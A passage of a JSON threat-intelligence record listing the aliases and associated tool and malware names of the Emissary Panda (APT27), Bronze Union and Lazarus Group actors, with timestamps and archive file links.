			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434201,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.pdf",
		"text": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.txt",
		"img": "https://archive.orkl.eu/1aa5a21d68cedb2cffb923a011be8e5cd7b1bb64.jpg"
	}
}